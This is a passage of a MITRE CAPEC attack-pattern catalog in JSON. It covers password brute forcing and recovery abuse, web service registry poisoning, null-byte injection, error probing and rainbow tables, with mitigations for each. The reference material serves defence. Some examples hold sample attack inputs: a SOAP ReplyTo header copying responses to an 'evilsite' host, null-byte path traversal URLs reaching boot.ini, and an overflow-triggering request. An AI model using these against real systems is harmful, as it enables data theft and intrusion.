available.",{"Level":"Low"}]},"Resources_Required":{"Resource":"A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge)."},"Indicators":{"Indicator":"Many incorrect login attempts are detected by the system."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.","Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.","Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen."]},"Example_Instances":{"Example":[{"p":["A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the adversary does not know the length of the users\' password, an adversary can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the adversary were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.","An adversary\'s job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster."]},"A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). See also: CVE-2004-1143"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"257"},{"CWE_ID":"654"},{"CWE_ID":"307"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1110.001","Entry_Name":"Brute Force:Password Guessing"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Description, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"50":{"ID":"50","Name":"Password Recovery Exploitation","Abstraction":"Standard","Status":"Draft","Description":"An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure. Most of them use only one security question . For instance, mother\'s maiden name tends to be a fairly popular one. Unfortunately in many cases this information is not very hard to find, especially if the attacker knows the legitimate user. These generic security questions are also re-used across many applications, thus making them even more insecure. An attacker could for instance overhear a coworker talking to a bank representative at the work place and supplying their mother\'s maiden name for verification purposes. An attacker can then try to log in into one of the victim\'s accounts, click on \\"forgot password\\" and there is a good chance that the security question there will be to provide mother\'s maiden name. A weak password recovery scheme totally undermines the effectiveness of a strong password scheme.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Understand the password recovery mechanism and how it works."},{"Step":"2","Phase":"Exploit","Description":"Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer."}]},"Prerequisites":{"Prerequisite":["The system allows users to recover their passwords and gain access back into the system.","Password recovery mechanism has been designed or implemented insecurely.","Password recovery mechanism relies only on something the user knows and not something the user has.","No third party intervention is required to use the password recovery mechanism."]},"Skills_Required":{"Skill":["Brute force attack",{"Level":"Low"},"Social engineering and more sophisticated technical attacks.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"For a brute force attack one would need a machine with sufficient CPU, RAM and HD."},"Indicators":{"Indicator":"Many incorrect attempts to answer the security question."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Use multiple security questions (e.g. have three and make the user answer two of them correctly). Let the user select their own security questions or provide them with choices of questions that are not generic.","E-mail the temporary password to the registered e-mail address of the user rather than letting the user reset the password online.","Ensure that your password recovery functionality is not vulnerable to an injection style attack."]},"Example_Instances":{"Example":["An attacker clicks on the \\"forgot password\\" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog\'s name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.",{"p":["phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.","A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user\'s password and taking over their account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.","The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:","A bug in the implementation of eregi() allows to pass additional character using a null byte \\"\\\\0\\". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character \\" \' \\" to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:","This query will return a non-zero result set even though the email supplied (attacker\'s email) is not in the database.","Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system."],"div":["if(!eregi(\\"^[_a-z0-9-]+(\\\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\\\.[a-z0-9-]+)*",{"style":"margin-left:10px;","class":"informative","div":["(\\\\.[a-z]{2,3})$\\", $email)){",{"style":"margin-left:10px;"}]},"$get_info=mysql_query(\\"select * from banneruser where",{"style":"margin-left:10px;","class":"informative","div":["email=\'$email\' \\");",{"style":"margin-left:10px;"}]}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"522"},{"CWE_ID":"640"}]},"References":{"Reference":{"External_Reference_ID":"REF-429"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"51":{"ID":"51","Name":"Poison Web Service Registry","Abstraction":"Detailed","Status":"Draft","Description":"SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces. WS-Addressing is used to virtualize services, provide return addresses and other routing information, however, unless the WS-Addressing headers are protected they are vulnerable to rewriting. Content in a registry is deployed by the service provider. The registry in an SOA or Web Services system can be accessed by the service requester via UDDI or other protocol.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"203"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find a target SOA or Web Service] The adversary must first indentify a target SOA or Web Service."},{"Step":"2","Phase":"Experiment","Description":"[Determine desired outcome] Because poisoning a web service registry can have different outcomes, the adversary must decide how they wish to effect the webservice.","Technique":["An adversary can perform a denial of service attack on a web service.","An adversary can redirect requests or responses to a malicious service."]},{"Step":"3","Phase":"Experiment","Description":"[Determine if a malicious service needs to be created] If the adversary wishes to redirect requests or responses, they will need to create a malicious service to redirect to.","Technique":["Create a service to that requests are sent to in addition to the legitimate service and simply record the requests.","Create a service that will give malicious responses to a service provider.","Act as a malicious service provider and respond to requests in an arbitrary way."]},{"Step":"4","Phase":"Exploit","Description":"[Poison Web Service Registry] Based on the desired outcome, poison the web service registry. This is done by altering the data at rest in the registry or uploading malicious content by spoofing a service provider.","Technique":["Intercept and change WS-Adressing headers to route to a malicious service or service provider.","Provide incorrect information in schema or metadata to cause a denial of service.","Delete information about service procider interfaces to cause a denial of service."]}]},"Prerequisites":{"Prerequisite":"The attacker must be able to write to resources or redirect access to the service registry."},"Skills_Required":{"Skill":["To identify and execute against an over-privileged system interface",{"Level":"Low"}]},"Resources_Required":{"Resource":"Capability to directly or indirectly modify registry resources"},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Design: Enforce principle of least privilege","Design: Harden registry server and file access permissions","Implementation: Implement communications to and from the registry using secure protocols"]},"Example_Instances":{"Example":{"p":["WS-Addressing provides location and metadata about the service endpoints. An extremely hard to detect attack is an attacker who updates the WS-Addressing header, leaves the standard service request and service provider addressing and header information intact, but adds an additional WS-Addressing Replyto header. In this case the attacker is able to send a copy (like a cc in mail) of every result the service provider generates. So every query to the bank account service, would generate a reply message of the transaction status to both the authorized service requester and an attacker service. This would be extremely hard to detect at runtime.","In this example \\"evilsite\\" is an additional reply to address with full access to all the messages that the authorized (validClient) has access to. Since this is registered with ReplyTo header it will not generate a Soap fault."],"div":["<S:Header>",{"style":"margin-left:10px;","class":"informative","div":["<wsa:MessageID>",{"style":"margin-left:10px;","div":["http://example.com/Message",{"style":"margin-left:10px;"},"<wsa:Address>http://valid.example/validClient</wsa:Address>",{"style":"margin-left:10px;"},"<wsa:Address>http://evilsite/evilClient</wsa:Address>",{"style":"margin-left:10px;"},"<wsa:Address>http://validfaults.example/ErrorHandler</wsa:Address>",{"style":"margin-left:10px;"}]}]}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"285"},{"CWE_ID":"74"},{"CWE_ID":"693"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow"}}},"52":{"ID":"52","Name":"Embedding NULL Bytes","Abstraction":"Detailed","Status":"Draft","Description":"An attacker embeds one or more null bytes in input to the target software. This attack relies on the usage of a null-valued byte as a string terminator in many environments. The goal is for certain components of the target software to stop processing the input when it encounters the null byte(s).","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Identify a place in the program where user input may be used to escalate privileges by for instance accessing unauthorized file system resources through directory browsing."},{"Step":"2","Phase":"Explore","Description":"An attacker realizes that there is a postfix data that gets in the way of getting to the desired resources"},{"Step":"3","Phase":"Exploit","Description":"An attacker then ads a postfix NULL terminator to the supplied input in order to \\"swallow\\" the postfixed data when the insertion is taking place. With the postfix data that got in the way of the attack gone, the doors are opened for accessing the desired resources."}]},"Prerequisites":{"Prerequisite":"The program does not properly handle postfix NULL terminators"},"Skills_Required":{"Skill":["Directory traversal",{"Level":"Medium"},"Execution of arbitrary code",{"Level":"High"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"}]},"Mitigations":{"Mitigation":"Properly handle the NULL characters supplied as part of user input prior to doing anything with the data."},"Example_Instances":{"Example":[{"p":["Directory Browsing","Assume a Web application allows a user to access a set of reports. The path to the reports directory may be something like web/username/reports. If the username is supplied via a hidden field, an attacker could insert a bogus username such as ../../../../../WINDOWS. If the attacker needs to remove the trailing string /reports, then they can simply insert enough characters so the string is truncated. Alternatively the attacker might apply the postfix NULL character (%00) to determine whether this terminates the string.","Different forms of NULL to think about include"],"div":["PATH%00",{"style":"margin-left:10px;","class":"informative"}]},{"p":["Exploitation of a buffer overflow vulnerability in the ActiveX component packaged with Adobe Systems Inc.\'s Acrobat/Acrobat Reader allows remote attackers to execute arbitrary code.","The problem specifically exists upon retrieving a link of the following form:","Where [long string] is a malicious crafted long string containing acceptable URI characters. The request must be made to a web server that truncates the request at the null byte (%00), otherwise an invalid file name is specified and a \\"file not found\\" page will be returned. Example web servers that truncate the requested URI include Microsoft IIS and Netscape Enterprise. Though the requested URI is truncated for the purposes of locating the file the long string is still passed to the Adobe ActiveX component responsible for rendering the page. This in turn triggers a buffer overflow within RTLHeapFree() allowing for an attacker to overwrite an arbitrary word in memory. The responsible instructions from RTLHeapFree() are shown here:","The register EDI contains a pointer to a user-supplied string. The attacker therefore has control over both the ECX and EAX registers used in the shown MOV instruction.","Successful exploitation allows remote attackers to utilize the arbitrary word overwrite to redirect the flow of control and eventually take control of the affected system. Code execution will occur under the context of the user that instantiated the vulnerable version of Adobe Acrobat.","An attacker does not need to establish a malicious web site as exploitation can occur by adding malicious content to the end of any embedded link and referencing any Microsoft IIS or Netscape Enterprise web server. Clicking on a direct malicious link is also not required as it may be embedded within an IMAGE tag, an IFRAME or an auto-loading script.","Successful exploitation requires that a payload be written such that certain areas of the input are URI acceptable. This includes initial injected instructions as well as certain overwritten addresses. This increases the complexity of successful exploitation. While not trivial, exploitation is definitely plausible [REF-445]."],"div":["GET /any_existing_dir/any_existing_pdf.pdf%00[long string] HTTP/1.1",{"style":"margin-left:10px;","class":"informative"},"0x77F83AE5 MOV EAX,[EDI+8]",{"style":"margin-left:10px;","class":"informative"}]},{"p":["Consider the following PHP script:","A malicious attacker might open the following URL, disclosing the boot.ini file:"],"div":["$whatever = addslashes($_REQUEST[\'whatever\']);",{"style":"margin-left:10px;","class":"informative"},"http://localhost/phpscript.php?whatever=../../../../boot.ini%00",{"style":"margin-left:10px;","class":"informative"}]}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"158"},{"CWE_ID":"172"},{"CWE_ID":"173"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"28","Entry_Name":"Null Byte Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Embedding Null Code"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-445"},{"External_Reference_ID":"REF-446"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"53":{"ID":"53","Name":"Postfix, Null Terminate, and Backslash","Abstraction":"Detailed","Status":"Draft","Description":"If a string is passed through a filter of some kind, then a terminal NULL may not be valid. Using alternate representation of NULL allows an attacker to embed the NULL mid-string while postfixing the proper data so that the filter is avoided. One example is a filter that looks for a trailing slash character. If a string insertion is possible, but the slash must exist, an alternate encoding of NULL in mid-string may be used.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"An attacker first probes to figure out what restrictions on input are placed by filter, such as a specific characters on the end of the URL."},{"Step":"2","Phase":"Exploit","Description":"The attacker then injects a string of their choosing with a null terminator (using an alternate encoding such as %00), followed by a backslash (%5C), followed by some additional characters that are required to keep the filter happy"},{"Step":"3","Phase":"Exploit","Description":{"p":["The malicious string then passes through the filter and passed to the underlying API. Everything after the null terminator is ignored. This may give an attacker the opportunity to access file system resources to which they should not have access and do other things.","Some popular forms in which this takes place:"],"div":["PATH%00%5C",{"style":"margin-left:10px;","class":"informative"}]}}]},"Prerequisites":{"Prerequisite":"Null terminators are not properly handled by the filter."},"Skills_Required":{"Skill":["An attacker needs to understand alternate encodings, what the filter looks for and the data format acceptable to the target API",{"Level":"Medium"}]},"Indicators":{"Indicator":"Null characters are observed by the filter. The filter needs to be able to understand various encodings of the Null character, or only canonical data should be passed to it."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Properly handle Null characters. Make sure canonicalization is properly applied. Do not pass Null characters to the underlying APIs.","Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system."]},"Example_Instances":{"Example":{"p":["A rather simple injection is possible in a URL:","This attack has appeared with regularity in the wild. There are many variations of this kind of attack. Spending a short amount of time injecting against Web applications will usually result in a new exploit being discovered."],"div":["http://getAccessHostname/sekbin/",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"158"},{"CWE_ID":"172"},{"CWE_ID":"173"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"54":{"ID":"54","Name":"Query System for Information","Abstraction":"Standard","Status":"Draft","Description":"An adversary, aware of an application\'s location (and possibly authorized to use the application), probes an application\'s structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.","Likelihood_Of_Attack":"High","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"116","Exclude_Related":[{"Exclude_ID":"514"},{"Exclude_ID":"437"}]}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine parameters] Determine all user-controllable parameters of the application either by probing or by finding documentation"},{"Step":"2","Phase":"Experiment","Description":"[Cause error condition] Inject each parameter with content that causes an error condition to manifest"},{"Step":"3","Phase":"Experiment","Description":"[Modify parameters] Modify the content of each parameter according to observed error conditions"},{"Step":"4","Phase":"Exploit","Description":"[Follow up attack] Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)"}]},"Prerequisites":{"Prerequisite":"This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities."},"Skills_Required":{"Skill":["Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design.",{"Level":"Medium"}]},"Resources_Required":{"Resource":{"p":["The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the adversary.","The Attack does not need special hardware, software, skills, or access."]}},"Indicators":{"Indicator":"Repeated errors generated by the same piece of code are an indication, although it requires careful monitoring of the application and its associated error logs, if any."},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Application designers can construct a \'code book\' for error messages. When using a code book, application error messages aren\'t generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value \'coding\' for the error. Such a technique will require helpdesk and hosting personnel to use a \'code book\' or similar mapping to decode application errors/logs in order to respond to them normally.","Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above \'code book\' suggestion."]},"Example_Instances":{"Example":["Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705",{"p":["Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.","In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them."]}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"209"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow, Resources_Required"}],"Previous_Entry_Name":["Probe Application Error Reporting",{"Date":"2015-11-09"}]}},"55":{"ID":"55","Name":"Rainbow Table Password Cracking","Abstraction":"Detailed","Status":"Draft","Description":"An attacker gets access to the database table where hashes of passwords are stored. They then use a rainbow table of pre-computed hash chains to attempt to look up the original password. Once the original password corresponding to the hash is obtained, the attacker uses the original password to gain access to the system. A password rainbow table stores hash chains for various passwords. A password chain is computed, starting from the original password, P, via a reduce(compression) function R and a hash function H. A recurrence relation exists where Xi+1 = R(H(Xi)), X0 = P. Then the hash chain of length n for the original password P can be formed: X1, X2, X3, ... , Xn-2, Xn-1, Xn, H(Xn). P and H(Xn) are then stored together in the rainbow table. Constructing the rainbow tables takes a very long time and is computationally expensive. A separate table needs to be constructed for the various hash algorithms (e.g. SHA1, MD5, etc.). However, once a rainbow table is computed, it can be very effective in cracking the passwords that have been hashed without the use of salt.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine application\'s/system\'s password policy] Determine the password policies of the target application/system.","Technique":["Determine minimum and maximum allowed password lengths.","Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).","Determine account lockout policy (a strict account lockout policy will prevent brute force attacks)."]},{"Step":"2","Phase":"Explore","Description":"[Obtain password hashes] An attacker gets access to the database table storing hashes of passwords or potentially just discovers a hash of an individual password.","Technique":["Obtain copy of database table or flat file containing password hashes (by breaking access controls, using SQL Injection, etc.)","Obtain password hashes from platform-specific storage locations (e.g. Windows registry)","Sniff network packets containing password hashes."]},{"Step":"3","Phase":"Exploit","Description":"[Run rainbow table-based password cracking tool] An attacker finds or writes a password cracking tool that uses a previously computed rainbow table for the right hashing algorithm. It helps if the attacker knows what hashing algorithm was used by the password system.","Technique":"Run rainbow table-based password cracking tool such as Ophcrack or RainbowCrack. Reduction function must depend on application\'s/system\'s password policy."}]},"Prerequisites":{"Prerequisite":["Hash of the original password is available to the attacker. For a better chance of success, an attacker should have more than one hash of the original password, and ideally the whole table.","Salt was not used to create the hash of the original password. Otherwise the rainbow tables have to be re-computed, which is very expensive and will make the attack effectively infeasible (especially if salt was added in iterations).","The system uses one factor password based authentication."]},"Skills_Required":{"Skill":["A variety of password cracking tools are available that can leverage a rainbow table. The more difficult part is to obtain the password hash(es) in the first place.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Rainbow table of password hash chains with the right algorithm used. A password cracking tool that leverages this rainbow table will also be required. Hash(es) of the password is required."},"Indicators":{"Indicator":"This is a completely offline attack that an attacker can perform at their leisure after the password hashes are obtained."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":"Use salt when computing password hashes. That is, concatenate the salt (random bits) with the original password prior to hashing it."},"Example_Instances":{"Example":"BusyBox 1.1.1 does not use a salt when generating passwords, which makes it easier for local users to guess passwords from a stolen password file using techniques such as rainbow tables. See also: CVE-2006-1058"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"261"},{"CWE_ID":"521"},{"CWE_ID":"262"},{"CWE_ID":"263"},{"CWE_ID":"654"},{"CWE_ID":"916"},{"CWE_ID":"308"},{"CWE_ID":"309"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1110.002","Entry_Name":"Brute Force:Password Cracking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Related_Attack_Patterns, Related_Weaknesses, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated @Abstraction, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"57":{"ID":"57","Name":"Utilizing REST\'s Trust in the System Resource to Obtain Sensitive Data","Abstraction":"Detailed","Status":"Draft","Description":"This attack utilizes a REST(REpresentational State Transfer)-style applications\' trust in the system resources and environment to obtain sensitive data once SSL is terminated. Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required. Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The attacker can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the attacker gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service\'s authentication scheme.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"157"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find a REST-style application that uses SSL] The adversary must first find a REST-style application that uses SSL to target. Because this attack is easier to carry out from inside of a server network, it is likely that an adversary could have inside knowledge of how services 